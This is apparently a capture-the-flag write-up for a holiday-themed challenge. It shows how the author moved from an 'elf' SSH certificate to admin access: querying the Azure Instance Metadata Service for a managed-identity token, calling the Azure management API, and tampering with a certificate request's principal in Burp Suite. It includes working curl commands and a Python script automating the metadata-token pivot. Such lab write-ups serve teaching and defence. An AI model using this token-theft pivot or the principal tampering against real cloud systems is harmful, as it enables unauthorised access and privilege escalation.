Certificate SSHenanigans
Tools/Skills: Certificates, SSH, Azure Instance Metadata Service, Python, Burp Suite, Source Code
SYNOPSIS
I needed to get access to an admin account to determine what kind of cookies were on Alabaster's to-do list.
Using the certificate generator website, I created a certificate carrying the default "elf" principal and used it to SSH into the system as the "monitor" user. From there I found information I could use to reach the certificate website's source code: by querying the Azure Instance Metadata Service I obtained the subscription ID, the resource group, and an access token for the VM's managed identity, and with those I pulled the website's source control details from the Azure management API. The source code revealed that the certificate request accepts a principal parameter. Having already established that I needed a principal of "admin", I intercepted the certificate request with Burp Suite, set the principal to "admin", and obtained an admin certificate. I then logged in as alabaster and found that gingerbread cookies were on Alabaster's to-do list.
SOLUTION
CREATE PUBLIC KEY & PRIVATE KEY PAIR
SSH INTO MONITOR
ssh monitor@ssh-server-vm.santaworkshopgeeseislands.org -i monitor_ssh_key
PRINCIPALS
SUBSCRIPTION ID & RESOURCE GROUP
curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2022-03-01" | jq
SUBSCRIPTION ID: 2b0942f3-9bca-484b-a508-abdae2db5e64
RESOURCE GROUP: NORTHPOLE-RG1
ACCESS TOKEN
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
NAME OF APP
App name (the first label of the azurewebsites.net hostname): northpole-ssh-certs-fa
Website URL: https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl
REPOSITORY
curl -X GET \
  -H "Authorization: Bearer [access token]" \
  "https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web?api-version=2022-03-01"
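The three steps above (instance metadata, token, management API) are one pivot, so here it is end to end as an added Python example rather than the page's own commands. The helper names are mine; SAMPLE_INSTANCE and SAMPLE_TOKEN are constructed to mirror the shape of the IMDS responses so that the offline path runs anywhere, and only run_live() actually talks to IMDS, which works only from inside an Azure VM.

```python
"""Pivot from the Azure Instance Metadata Service (IMDS) to the ARM API.

Added example, not code from the original write-up. Helper names are mine,
and SAMPLE_INSTANCE / SAMPLE_TOKEN are constructed to mirror the shape of
the IMDS responses so the offline path runs anywhere. Only run_live()
talks to IMDS, and it only works from inside an Azure VM.
"""
import base64
import json
import urllib.parse
import urllib.request

IMDS = "http://169.254.169.254/metadata"
ARM = "https://management.azure.com"
CERT_SITE = "https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert"


def imds_get(path, params):
    """GET an IMDS endpoint. IMDS answers only on the link-local address,
    requires the 'Metadata: true' header, and must be reached without a
    proxy (the reason the page's curl passes --noproxy "*")."""
    url = f"{IMDS}/{path}?{urllib.parse.urlencode(params)}"
    req = urllib.request.Request(url, headers={"Metadata": "true"})
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(req, timeout=5) as resp:
        return json.loads(resp.read())


def instance_identity(instance_doc):
    """Fields from /metadata/instance needed to build ARM resource paths."""
    compute = instance_doc["compute"]
    return {
        "subscription_id": compute["subscriptionId"],
        "resource_group": compute["resourceGroupName"],
        "vm_name": compute["name"],
    }


def app_name_from_url(url):
    """The App Service / Function App name is the first label of its
    *.azurewebsites.net hostname."""
    host = urllib.parse.urlsplit(url).hostname or ""
    if not host.endswith(".azurewebsites.net"):
        raise ValueError(f"not an azurewebsites.net host: {host}")
    return host.split(".", 1)[0]


def sourcecontrols_url(identity, app_name):
    """ARM resource exposing the app's deployment source (repo URL, branch)."""
    return (f"{ARM}/subscriptions/{identity['subscription_id']}"
            f"/resourceGroups/{identity['resource_group']}"
            f"/providers/Microsoft.Web/sites/{app_name}"
            f"/sourcecontrols/web?api-version=2022-03-01")


def token_claims(jwt):
    """Decode the JWT payload WITHOUT verifying it: enough to see which
    identity (appid/oid) and audience the managed-identity token carries."""
    payload = jwt.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def arm_get(url, access_token):
    req = urllib.request.Request(
        url, headers={"Authorization": f"Bearer {access_token}"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())


def run_live():
    """The whole pivot as run from the VM: instance doc -> token -> ARM."""
    ident = instance_identity(imds_get("instance", {"api-version": "2022-03-01"}))
    tok = imds_get("identity/oauth2/token", {
        "api-version": "2018-02-01", "resource": "https://management.azure.com/"})
    return arm_get(sourcecontrols_url(ident, app_name_from_url(CERT_SITE)),
                   tok["access_token"])


# ---- constructed sample data so the offline path can run anywhere ----
SAMPLE_INSTANCE = {"compute": {
    "name": "ssh-server-vm",
    "subscriptionId": "2b0942f3-9bca-484b-a508-abdae2db5e64",  # from the page
    "resourceGroupName": "northpole-rg1",                       # from the page
}}


def _b64url(obj):
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()


# Unsigned, made-up JWT carrying the claim names a real IMDS token has.
SAMPLE_TOKEN = {
    "token_type": "Bearer",
    "resource": "https://management.azure.com/",
    "access_token": ".".join([
        _b64url({"alg": "none", "typ": "JWT"}),
        _b64url({"aud": "https://management.azure.com/",
                 "appid": "00000000-0000-4000-8000-000000000001",
                 "oid": "00000000-0000-4000-8000-000000000002"}),
        ""]),
}

if __name__ == "__main__":
    ident = instance_identity(SAMPLE_INSTANCE)
    print(sourcecontrols_url(ident, app_name_from_url(CERT_SITE)))
    print(token_claims(SAMPLE_TOKEN["access_token"]))
```

Two things worth checking before firing the ARM request: the token's aud claim must be the management endpoint you asked for, and the identity it names (appid/oid) is the VM's managed identity, so the call only succeeds if that identity has been granted read access on the Function App. ARM resource group names are matched case-insensitively, which is why northpole-rg1 in the URL works even though IMDS reports it in upper case.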
The GitHub repo shows that the function accepts input for both the public key and the principal; if no principal is supplied it falls back to the default, "elf". The shape of the response, {"ssh_cert": string, "principal": string}, indicated the format the HTTP request wanted, and I also read the input sanitization to see what it would accept.
Using Burp Suite, I intercepted the request, set the principal to "admin", then copied and pasted the returned certificate into my certificate file for alabaster.
I logged in as alabaster (whose principal is "admin") and opened the to-do list file.
The answer is: Gingerbread
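The whole trick turns on the principal list inside the certificate, so here is an added example (not code from the original write-up) that decodes an OpenSSH certificate and runs the principal and validity checks that decide which account it may log into. ELF_CERT is the "elf" certificate quoted in the ChatGPT prompt further down this page; PRINCIPALS_BY_ACCOUNT is an assumption that only mirrors what the write-up observed (monitor accepted an "elf" certificate, alabaster needed "admin"), not the server's real configuration, and the function names are mine.

```python
"""Decode an OpenSSH user certificate and check which account it can log into.

Added example, not code from the original write-up. ELF_CERT is the "elf"
certificate quoted on this page; PRINCIPALS_BY_ACCOUNT is an assumed mapping
that mirrors the write-up's observations, not the real server config.
"""
import base64
import struct

ELF_CERT = (
    "ssh-ed25519-cert-v01@openssh.com "
    "AAAAIHNzaC1lZDI1NTE5LWNlcnQtdjAxQG9wZW5zc2guY29tAAAAJzI1MjUxODgwNjI1NDQxMTg2NDE0ODU5NTM2MzE0NzYxODY2NDU2NQ"
    "AAACChnwy68XO5RNMeGhmsaVPuCMxT1wEg0Z1EsnnpOlyFXwAAAAAAAAABAAAAAQAAACRlMGExNmU5OS1lNThlLTRlMzAtYTUyZS0yNDU1ODE3NGY2YjU"
    "AAAAHAAAAA2VsZgAAAABllZ6tAAAAAGW6idkAAAAAAAAAEgAAAApwZXJtaXQtcHR5AAAAAAAAAAAAAAAzAAAAC3NzaC1lZDI1NTE5"
    "AAAAIGk2GNMCmJkXPJHHRQH9+TM4CRrsq/7BL0wp+P6rCIWHAAAAUwAAAAtzc2gtZWQyNTUxOQ"
    "AAAEAllLS7ouA+8Mh6fUq6hkj8ot2k3Wrkfkiu4x7/DRqPwr05AQparr7QQjc6mpClc7DAtZD414nmpB4BjTpBnt8A"
)

PRINCIPALS_BY_ACCOUNT = {"monitor": {"elf"}, "alabaster": {"admin"}}  # assumed
CERT_TYPES = {1: "user", 2: "host"}


class Reader:
    """Cursor over SSH wire types (RFC 4251): string, uint32, uint64."""
    def __init__(self, data):
        self.data, self.pos = data, 0

    def _take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated certificate")
        self.pos += n
        return chunk

    def uint32(self):
        return struct.unpack(">I", self._take(4))[0]

    def uint64(self):
        return struct.unpack(">Q", self._take(8))[0]

    def string(self):
        return self._take(self.uint32())

    def done(self):
        return self.pos == len(self.data)


def _strings(blob):
    """A string holding back-to-back strings (the principals list)."""
    r, out = Reader(blob), []
    while not r.done():
        out.append(r.string().decode())
    return out


def _options(blob):
    """Critical options / extensions: (name, string-wrapped data) pairs."""
    r, out = Reader(blob), {}
    while not r.done():
        name = r.string().decode()
        out[name] = r.string()   # b"" for flag-style extensions such as permit-pty
    return out


def parse_cert(line):
    """Parse one line of an OpenSSH *-cert.pub file (ed25519 certs only)."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != "ssh-ed25519-cert-v01@openssh.com":
        raise ValueError("expected an ssh-ed25519-cert-v01@openssh.com line")
    r = Reader(base64.b64decode(parts[1]))
    cert = {"key_type": r.string().decode()}
    if cert["key_type"] != parts[0]:
        raise ValueError("type prefix does not match the blob")
    cert["nonce"] = r.string()
    cert["public_key"] = r.string()            # the 32-byte key being certified
    cert["serial"] = r.uint64()
    cert["type"] = CERT_TYPES.get(r.uint32(), "unknown")
    cert["key_id"] = r.string().decode()       # free text chosen by the CA
    cert["principals"] = _strings(r.string())  # what sshd matches against
    cert["valid_after"] = r.uint64()
    cert["valid_before"] = r.uint64()
    cert["critical_options"] = _options(r.string())
    cert["extensions"] = _options(r.string())
    r.string()                                 # reserved, empty
    ca = Reader(r.string())
    cert["ca_key_type"], cert["ca_key"] = ca.string().decode(), ca.string()
    sig = Reader(r.string())
    cert["sig_type"], cert["signature"] = sig.string().decode(), sig.string()
    if not r.done():
        raise ValueError("trailing bytes after signature")
    return cert


def allowed_login(cert, account, principals_by_account, now):
    """The type, validity and principal checks sshd applies to a user cert
    (CA trust and the signature itself are checked separately, not here)."""
    if cert["type"] != "user":
        return False
    if not (cert["valid_after"] <= now < cert["valid_before"]):
        return False
    return bool(set(cert["principals"]) & principals_by_account.get(account, set()))


if __name__ == "__main__":
    c = parse_cert(ELF_CERT)
    print(c["key_id"], c["principals"], sorted(c["extensions"]))
    for account in ("monitor", "alabaster"):
        print(account, allowed_login(c, account, PRINCIPALS_BY_ACCOUNT, c["valid_after"] + 1))
```

On the client side, ssh picks up a certificate automatically when it is saved next to the identity as `<identity>-cert.pub` (so `monitor_ssh_key-cert.pub` beside `-i monitor_ssh_key`), and `ssh-keygen -L -f monitor_ssh_key-cert.pub` prints the same fields this parser returns. On the server side, a principal such as "elf" only maps to a login name like monitor because sshd has an AuthorizedPrincipalsFile (or AuthorizedPrincipalsCommand) for that account; without one, the certificate's principals must contain the login name itself. That mapping is exactly why swapping the principal to "admin" is the whole attack.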
PROCESS
This was a two-day process. It was circular, tangential, dimensional-hopping at times. It was practically never linear.
Tools I used:
Provided Video
Discord
Reading through the different clues and recommended websites proved invaluable.
ChatGPT
Example Prompt:
I have a public and private key pair generated on my computer. An ssh certificate was created by someone else. All I have is:
{"ssh_cert": "ssh-ed25519-cert-v01@openssh.com AAAAIHNzaC1lZDI1NTE5LWNlcnQtdjAxQG9wZW5zc2guY29tAAAAJzI1MjUxODgwNjI1NDQxMTg2NDE0ODU5NTM2MzE0NzYxODY2NDU2NQAAACChnwy68XO5RNMeGhmsaVPuCMxT1wEg0Z1EsnnpOlyFXwAAAAAAAAABAAAAAQAAACRlMGExNmU5OS1lNThlLTRlMzAtYTUyZS0yNDU1ODE3NGY2YjUAAAAHAAAAA2VsZgAAAABllZ6tAAAAAGW6idkAAAAAAAAAEgAAAApwZXJtaXQtcHR5AAAAAAAAAAAAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIGk2GNMCmJkXPJHHRQH9+TM4CRrsq/7BL0wp+P6rCIWHAAAAUwAAAAtzc2gtZWQyNTUxOQAAAEAllLS7ouA+8Mh6fUq6hkj8ot2k3Wrkfkiu4x7/DRqPwr05AQparr7QQjc6mpClc7DAtZD414nmpB4BjTpBnt8A ",
"principal": "elf"
}
How do I get the certificate on my computer?